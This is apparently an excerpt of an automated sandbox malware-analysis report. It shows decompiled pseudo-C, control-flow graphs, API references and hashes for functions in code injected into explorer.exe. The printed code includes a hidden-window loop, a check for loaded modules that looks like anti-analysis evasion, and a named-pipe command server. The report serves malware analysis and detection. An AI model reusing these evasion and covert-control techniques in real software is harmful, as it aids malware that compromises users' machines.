        0x00092586
        0x00092570
        0x00092578
        0x00092578
        0x00092589
        0x0009258d
        0x00092599
        0x0009259d
        0x000925a1
        0x000925a5
        0x000925b1
        0x000925dc
        0x000925e4
        0x000925f6
        0x00092602
        0x000925b3
        0x000925b8
        0x000925c3
        0x000925cf
        0x000925cf
        0x0009260b
        0x00092611
        0x0009261b
        0x00092637
        0x0009261d
        0x0009262c
        0x0009262c
        0x0009261b
        0x0009263f
        0x00092648
        0x00092648
        0x00092656
        0x00000000
        0x00092656
        0x00092562
        0x00000000
        0x00092562
        0x00000000
        0x0009253a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
        • LoadLibraryA.KERNEL32(00000000), ref: 00092551
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
        • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
        • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
        • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 164 82eda-82f50 memset call 8902d 169 82fcd-82fd4 164->169 170 82f52-82f81 CreateWindowExA 164->170 171 82fdf-82ff4 169->171 172 82fd6-82fd7 169->172 170->171 173 82f83-82f92 ShowWindow 170->173 172->171 175 82f9b 173->175 176 82fba-82fcb 175->176 176->169 178 82f9d-82fa0 176->178 178->169 179 82fa2-82fb2 178->179 179->176
        C-Code - Quality: 96%
        			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0x133f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0x133fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x50056
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0x133fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0x133fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0x133fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0x133fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0x133fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0x133fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}























        0x00082ee3
        0x00082ef2
        0x00082ef9
        0x00082efe
        0x00082f18
        0x00082f20
        0x00082f2d
        0x00082f34
        0x00082f3a
        0x00082f41
        0x00082f42
        0x00082f47
        0x00082f50
        0x00082fcd
        0x00082fcd
        0x00082fd4
        0x00082fd7
        0x00082fdc
        0x00082fdc
        0x00082fdf
        0x00082fe7
        0x00082fec
        0x00082ff4
        0x00082ff4
        0x00082f77
        0x00082f7a
        0x00082f81
        0x00000000
        0x00000000
        0x00082f8a
        0x00082f8d
        0x00082f98
        0x00082fba
        0x00082fc1
        0x00082fc6
        0x00082fcb
        0x00000000
        0x00000000
        0x00082fa0
        0x00000000
        0x00000000
        0x00082fa6
        0x00082fab
        0x00082fb2
        0x00082fb7
        0x00082fb7
        0x00000000

        APIs
        • memset.MSVCRT ref: 00082EF9
        • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
        • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Window$CreateShowmemset
        • String ID: 0
        • API String ID: 3027179219-4108050209
        • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
        • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
        • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
        • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 181 84d6d-84d8f 182 84dee-84e1b call 8b7a8 call 8a86d call 8a471 181->182 183 84d91-84db3 call 895c7 * 2 181->183 196 84e1d-84e20 182->196 197 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 182->197 183->182 193 84db5-84db7 183->193 193->182 195 84db9-84dc4 GetModuleHandleA 193->195 198 84dcd 195->198 199 84dc6-84dcb GetModuleHandleA 195->199 200 852b9-852bf 196->200 216 84ea1-84ed9 call 8861a call 84a0b 197->216 217 84e82-84e93 call 8896f 197->217 202 84dd5-84dec call 885c2 * 2 198->202 199->198 199->202 202->182 202->196 227 84ef8-84f1b 216->227 228 84edb-84ee3 216->228 222 84e9c-84e9f 217->222 223 84e95-84e97 call 8a2e3 217->223 222->216 223->222 230 84f1d-84f2b 227->230 231 84f2f-84f4d call 8e2c6 227->231 228->227 229 84ee5-84ee9 228->229 232 84eef-84ef2 229->232 233 851f3-85220 call 895e1 call 892e5 229->233 230->231 239 84f52-84f54 231->239 232->227 232->233 244 85222-8522b call 8b269 233->244 245 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 233->245 241 84f71-84f78 239->241 242 84f56-84f6a call 8e2c6 239->242 241->233 243 84f7e-84f87 241->243 242->241 247 84f89-84f8e 243->247 248 84f96-84fa3 243->248 256 85239-85246 call 8861a 244->256 257 8522d-85232 244->257 278 852b7 245->278 247->248 252 84f90 247->252 248->233 253 84fa9-84fad 248->253 252->248 258 85082-85088 253->258 259 84fb3-84fb6 253->259 256->245 257->256 258->233 264 8508e-850ff call 849a5 call 8fc1f 258->264 259->233 262 84fbc-8500f call 849a5 call 88604 259->262 262->278 282 85015-8507d call 895e1 call 89640 call 885d5 call 8a911 call 8861a 262->282 264->233 281 85105-85119 call 88604 264->281 278->200 281->233 288 8511f-85171 call 8109a call 8902d call 860df 281->288 282->278 302 85173-851e2 call 89640 call 885d5 call 8a911 call 8861a 288->302 303 851e5-851f2 call 8861a 288->303 302->303 303->233
        C-Code - Quality: 70%
        			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x133fda0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x133fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x133fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x133fda0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x133f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1);
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x133f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x133f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}




















































































        0x00084d6d
        0x00084d73
        0x00084d79
        0x00084d7e
        0x00084d8c
        0x00084d8f
        0x00084dee
        0x00084df7
        0x00084e00
        0x00084e03
        0x00084e0a
        0x00084e0f
        0x00084e14
        0x00084e1b
        0x00084e25
        0x00084e2c
        0x00084e32
        0x00084e37
        0x00084e3c
        0x00084e43
        0x00084e49
        0x00084e4b
        0x00084e4c
        0x00084e50
        0x00084e5b
        0x00084e60
        0x00084e69
        0x00084e6e
        0x00084e76
        0x00084e7d
        0x00084e7e
        0x00084e80
        0x00084e9c
        0x00084e9f
        0x00084e9f
        0x00084ea8
        0x00084ead
        0x00084ebd
        0x00084ec5
        0x00084eca
        0x00084ed0
        0x00084ed3
        0x00084ed9
        0x00084ef8
        0x00084efe
        0x00084eff
        0x00084f00
        0x00084f01
        0x00084f02
        0x00084f03
        0x00084f0d
        0x00084f11
        0x00084f16
        0x00084f19
        0x00084f1b
        0x00084f2d
        0x00084f2d
        0x00084f2f
        0x00084f3b
        0x00084f40
        0x00084f46
        0x00084f4f
        0x00084f52
        0x00084f54
        0x00084f5f
        0x00084f64
        0x00084f69
        0x00084f6e
        0x00084f6e
        0x00084f71
        0x00084f78
        0x00000000
        0x00084f7e
        0x00084f7e
        0x00084f83
        0x00084f87
        0x00084f89
        0x00084f8c
        0x00084f8e
        0x00084f94
        0x00084f94
        0x00084f8e
        0x00084f96
        0x00084f9b
        0x00084fa1
        0x00084fa3
        0x00000000
        0x00084fa9
        0x00084fa9
        0x00084fad
        0x00085082
        0x00085088
        0x0008508e
        0x00085099
        0x0008509a
        0x0008509b
        0x0008509c
        0x000850a2
        0x000850a7
        0x000850ad
        0x000850b5
        0x000850bb
        0x000850be
        0x000850cd
        0x000850d4
        0x000850d7
        0x000850e4
        0x000850e8
        0x000850f5
        0x000850fa
        0x000850fd
        0x000850ff
        0x00085110
        0x00085112
        0x00085116
        0x00085117
        0x00085119
        0x00085124
        0x00085129
        0x00085136
        0x0008513a
        0x0008513b
        0x0008513d
        0x00085145
        0x00085146
        0x0008514b
        0x00085163
        0x00085168
        0x0008516b
        0x0008516f
        0x00085171
        0x00085184
        0x0008518e
        0x00085192
        0x0008519a
        0x0008519b
        0x000851a3
        0x000851a4
        0x000851a9
        0x000851b5
        0x000851bf
        0x000851d1
        0x000851dd
        0x000851e2
        0x000851e2
        0x000851ec
        0x000851f2
        0x000851f2
        0x00085119
        0x000850ff
        0x00000000
        0x00085088
        0x00084fb3
        0x00084fb6
        0x00000000
        0x00000000
        0x00084fbc
        0x00084fc7
        0x00084fc8
        0x00084fc9
        0x00084fca
        0x00084fd0
        0x00084fd5
        0x00084fe9
        0x00084fee
        0x00084ff2
        0x00084ffd
        0x00085006
        0x00085008
        0x0008500c
        0x0008500d
        0x0008500f
        0x0008501a
        0x00085020
        0x00085032
        0x00085035
        0x00085038
        0x00085045
        0x0008504d
        0x00085057
        0x00085069
        0x00085075
        0x0008507a
        0x00000000
        0x0008500f
        0x00084fa3
        0x00084edb
        0x00084edb
        0x00084ee1
        0x00084ee3
        0x00000000
        0x00000000
        0x00084ee5
        0x00084ee9
        0x000851f3
        0x000851f8
        0x000851fe
        0x00085200
        0x00085201
        0x00085205
        0x00085215
        0x0008521a
        0x0008521e
        0x00085220
        0x00085224
        0x00085229
        0x0008522b
        0x0008522d
        0x00085233
        0x00085233
        0x00085240
        0x00085246
        0x0008524c
        0x00085251
        0x0008526f
        0x00085271
        0x0008527d
        0x0008527d
        0x00085283
        0x00085285
        0x0008528b
        0x0008529d
        0x000852a3
        0x000852af
        0x000852b7
        0x000852b7
        0x000852b7
        0x000852b9
        0x000852bf
        0x000852bf
        0x00084eef
        0x00084ef2
        0x00000000
        0x00000000
        0x00000000
        0x00084ef2
        0x00084ed9
        0x00084e1d
        0x00084e1d
        0x00000000
        0x00084e1d
        0x00084d9b
        0x00084da2
        0x00084dab
        0x00084dad
        0x00084db3
        0x00084dc4
        0x00084dcd
        0x00084dcd
        0x00084dd9
        0x00084de2
        0x00084de7
        0x00084dec
        0x00000000
        0x00000000
        0x00084dec

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
        • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
        • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
        • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
        • Opcode Fuzzy Hash: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
        • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189pipeCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 314 832a1-832b4 315 832b7-832ce ConnectNamedPipe 314->315 316 832d0-832db GetLastError 315->316 317 832e1-83304 315->317 316->317 318 834c2-834c8 316->318 320 834a8 GetLastError 317->320 321 8330a-8330e 317->321 322 834ae-834bc DisconnectNamedPipe 320->322 321->320 323 83314-83320 321->323 322->315 322->318 324 833b8-833d1 call 893be 323->324 325 83326-83329 323->325 337 83476-8349b call 896ca 324->337 338 833d7-833dd 324->338 326 8332b-8332f 325->326 327 83397-833b3 call 8c319 325->327 329 8337b-83384 call 8f79f 326->329 330 83331-83334 326->330 327->322 349 83358-8335b 329->349 334 83365-83369 call 8f79f 330->334 335 83336-83339 330->335 346 8336e-83376 334->346 343 8333b-8333e 335->343 344 8334f-83353 call 8f7c1 335->344 353 8349d-834a6 call 8c319 337->353 340 833df-833f6 call 88604 338->340 341 83454-8346f call 89749 call 81da0 338->341 359 833f8-833fd 340->359 360 83471 340->360 341->337 343->322 350 83344-8334d call 8f7c1 343->350 344->349 346->353 357 8335d-83363 349->357 358 83386-83388 349->358 350->346 353->322 362 8338a-83392 call 8c319 357->362 358->362 365 8342a-83452 call 89749 call 81da0 call 894b7 359->365 366 833ff-83402 359->366 369 83473 360->369 362->322 365->369 371 83404-83425 call 8c379 call 891a6 366->371 369->337 383 83427 371->383 383->365
        C-Code - Quality: 54%
        			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0x133f8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x1910020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x1910020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}




































        0x000832ac
        0x000832ae
        0x000832b0
        0x000832b4
        0x000832b7
        0x000832c3
        0x000832ce
        0x00000000
        0x00000000
        0x000832e1
        0x000832e5
        0x000832e6
        0x000832eb
        0x000832f0
        0x000832f6
        0x00083304
        0x000834a8
        0x00083314
        0x00083314
        0x0008331d
        0x00083320
        0x000833c8
        0x000833ca
        0x000833d1
        0x000833d7
        0x000833dd
        0x00083456
        0x00083461
        0x00083466
        0x00083469
        0x000833df
        0x000833e2
        0x000833ee
        0x000833f0
        0x000833f6
        0x00083471
        0x000833f8
        0x000833fd
        0x000833ff
        0x00083402
        0x00083404
        0x00083412
        0x00083417
        0x0008341a
        0x0008341b
        0x00083420
        0x00083423
        0x00083427
        0x00083427
        0x0008342c
        0x00083439
        0x0008343e
        0x00083441
        0x0008344d
        0x0008344d
        0x00083473
        0x00083473
        0x000833dd
        0x00083476
        0x0008348a
        0x0008348f
        0x0008349a
        0x0008349b
        0x00000000
        0x00083326
        0x00083326
        0x00083329
        0x00083397
        0x00083398
        0x0008339b
        0x0008339c
        0x000833a3
